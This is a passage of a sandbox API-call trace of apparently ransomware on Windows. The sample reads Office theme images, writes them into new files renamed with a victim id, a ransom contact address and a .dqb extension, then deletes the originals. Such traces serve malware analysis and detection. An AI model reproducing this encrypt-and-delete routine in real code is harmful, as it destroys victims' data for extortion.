(lpString=".dbf") returned 4 [0043.520] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0043.520] lstrlenW (lpString=".1cd") returned 4 [0043.520] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0043.520] lstrlenW (lpString=".jpg") returned 4 [0043.520] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0043.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0043.520] lstrlenW (lpString=".doc") returned 4 [0043.520] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.520] lstrlenW (lpString=".docx") returned 5 [0043.520] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.520] lstrlenW (lpString=".pdf") returned 4 [0043.520] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.520] lstrlenW (lpString=".xls") returned 4 [0043.520] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.520] lstrlenW (lpString=".xlsx") returned 5 [0043.520] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.520] lstrlenW (lpString=".ppt") returned 4 [0043.520] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0043.520] lstrlenW (lpString=".zip") returned 4 [0043.521] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.521] lstrlenW (lpString=".rar") returned 4 [0043.521] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.521] lstrlenW (lpString=".bz2") returned 4 [0043.521] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.521] lstrlenW (lpString=".7z") returned 3 [0043.521] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.521] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0043.521] lstrlenW (lpString=".dbf") returned 4 [0043.521] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.521] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0043.521] lstrlenW (lpString=".1cd") returned 4 [0043.521] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.521] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0043.521] lstrlenW (lpString=".jpg") returned 4 [0043.521] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.521] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0043.521] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0043.521] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0043.521] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=1287) returned 1 [0043.521] CloseHandle (hObject=0x17c) returned 1 [0043.522] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif")) returned 0x20 [0043.522] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.522] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0043.522] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.522] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.522] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0043.901] GetLastError () returned 0x0 [0043.901] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x507, lpOverlapped=0x0) returned 1 [0043.902] WriteFile (in: hFile=0x200, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x510, lpOverlapped=0x0) returned 1 [0043.903] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.903] WriteFile (in: hFile=0x200, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.903] SetEndOfFile (hFile=0x200) returned 1 [0043.903] CloseHandle (hObject=0x200) returned 1 [0043.903] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.904] SetEndOfFile (hFile=0x17c) returned 1 [0043.904] CloseHandle (hObject=0x17c) returned 1 [0043.904] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.904] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif")) returned 1 [0043.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0043.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0043.905] lstrlenW (lpString=".doc") returned 4 [0043.905] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.905] lstrlenW (lpString=".docx") returned 5 [0043.905] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.905] lstrlenW (lpString=".pdf") returned 4 [0043.905] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.905] lstrlenW (lpString=".xls") returned 4 [0043.905] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.905] lstrlenW (lpString=".xlsx") returned 5 [0043.905] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.905] lstrlenW (lpString=".ppt") returned 4 [0043.905] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0043.905] lstrlenW (lpString=".zip") returned 4 [0043.905] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.905] lstrlenW (lpString=".rar") returned 4 [0043.905] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.905] lstrlenW (lpString=".bz2") returned 4 [0043.905] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.905] lstrlenW (lpString=".7z") returned 3 [0043.905] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0043.905] lstrlenW (lpString=".dbf") returned 4 [0043.905] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0043.905] lstrlenW (lpString=".1cd") returned 4 [0043.905] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0043.905] lstrlenW (lpString=".jpg") returned 4 [0043.906] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0043.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0043.906] lstrlenW (lpString=".doc") returned 4 [0043.906] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.906] lstrlenW (lpString=".docx") returned 5 [0043.906] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.906] lstrlenW (lpString=".pdf") returned 4 [0043.906] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.906] lstrlenW (lpString=".xls") returned 4 [0043.906] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.906] lstrlenW (lpString=".xlsx") returned 5 [0043.906] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.906] lstrlenW (lpString=".ppt") returned 4 [0043.906] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0043.906] lstrlenW (lpString=".zip") returned 4 [0043.906] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.906] lstrlenW (lpString=".rar") returned 4 [0043.906] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.906] lstrlenW (lpString=".bz2") returned 4 [0043.906] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.906] lstrlenW (lpString=".7z") returned 3 [0043.906] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0043.906] lstrlenW (lpString=".dbf") returned 4 [0043.906] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0043.906] lstrlenW (lpString=".1cd") returned 4 [0043.906] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0043.906] lstrlenW (lpString=".jpg") returned 4 [0043.907] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.907] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0043.907] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0043.907] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0043.907] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=1354) returned 1 [0043.907] CloseHandle (hObject=0x17c) returned 1 [0043.907] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif")) returned 0x20 [0043.907] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.907] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0043.907] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.907] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.907] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0043.909] GetLastError () returned 0x0 [0043.909] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x54a, lpOverlapped=0x0) returned 1 [0043.910] WriteFile (in: hFile=0x204, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x550, lpOverlapped=0x0) returned 1 [0043.911] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.911] WriteFile (in: hFile=0x204, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.911] SetEndOfFile (hFile=0x204) returned 1 [0043.911] CloseHandle (hObject=0x204) returned 1 [0043.912] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.912] SetEndOfFile (hFile=0x17c) returned 1 [0043.912] CloseHandle (hObject=0x17c) returned 1 [0043.912] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.913] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif")) returned 1 [0043.913] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0043.913] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0043.913] lstrlenW (lpString=".doc") returned 4 [0043.913] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.913] lstrlenW (lpString=".docx") returned 5 [0043.913] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.913] lstrlenW (lpString=".pdf") returned 4 [0043.913] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.913] lstrlenW (lpString=".xls") returned 4 [0043.913] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.913] lstrlenW (lpString=".xlsx") returned 5 [0043.913] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.913] lstrlenW (lpString=".ppt") returned 4 [0043.913] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.913] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0043.913] lstrlenW (lpString=".zip") returned 4 [0043.913] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.913] lstrlenW (lpString=".rar") returned 4 [0043.913] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.913] lstrlenW (lpString=".bz2") returned 4 [0043.913] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.913] lstrlenW (lpString=".7z") returned 3 [0043.913] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0043.914] lstrlenW (lpString=".dbf") returned 4 [0043.914] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0043.914] lstrlenW (lpString=".1cd") returned 4 [0043.914] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0043.914] lstrlenW (lpString=".jpg") returned 4 [0043.914] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0043.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0043.914] lstrlenW (lpString=".doc") returned 4 [0043.914] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.914] lstrlenW (lpString=".docx") returned 5 [0043.914] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.914] lstrlenW (lpString=".pdf") returned 4 [0043.914] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.914] lstrlenW (lpString=".xls") returned 4 [0043.914] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.914] lstrlenW (lpString=".xlsx") returned 5 [0043.914] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.914] lstrlenW (lpString=".ppt") returned 4 [0043.914] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0043.914] lstrlenW (lpString=".zip") returned 4 [0043.914] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.914] lstrlenW (lpString=".rar") returned 4 [0043.914] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.914] lstrlenW (lpString=".bz2") returned 4 [0043.914] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.914] lstrlenW (lpString=".7z") returned 3 [0043.914] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0043.914] lstrlenW (lpString=".dbf") returned 4 [0043.914] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0043.914] lstrlenW (lpString=".1cd") returned 4 [0043.914] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0043.915] lstrlenW (lpString=".jpg") returned 4 [0043.915] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.915] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0043.915] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0043.915] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0043.915] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=32433) returned 1 [0043.915] CloseHandle (hObject=0x17c) returned 1 [0043.915] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png")) returned 0x20 [0043.915] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.915] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0043.915] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.915] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.915] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0043.916] GetLastError () returned 0x0 [0043.916] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x7eb1, lpOverlapped=0x0) returned 1 [0043.917] WriteFile (in: hFile=0x204, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x7ec0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x7ec0, lpOverlapped=0x0) returned 1 [0043.918] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.918] WriteFile (in: hFile=0x204, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.919] SetEndOfFile (hFile=0x204) returned 1 [0043.919] CloseHandle (hObject=0x204) returned 1 [0043.919] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.919] SetEndOfFile (hFile=0x17c) returned 1 [0043.920] CloseHandle (hObject=0x17c) returned 1 [0043.920] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.920] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png")) returned 1 [0043.920] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0043.920] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0043.920] lstrlenW (lpString=".doc") returned 4 [0043.920] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.920] lstrlenW (lpString=".docx") returned 5 [0043.920] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.920] lstrlenW (lpString=".pdf") returned 4 [0043.920] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.920] lstrlenW (lpString=".xls") returned 4 [0043.920] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.920] lstrlenW (lpString=".xlsx") returned 5 [0043.920] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.920] lstrlenW (lpString=".ppt") returned 4 [0043.920] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.920] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0043.920] lstrlenW (lpString=".zip") returned 4 [0043.920] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.920] lstrlenW (lpString=".rar") returned 4 [0043.920] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.920] lstrlenW (lpString=".bz2") returned 4 [0043.921] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.921] lstrlenW (lpString=".7z") returned 3 [0043.921] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 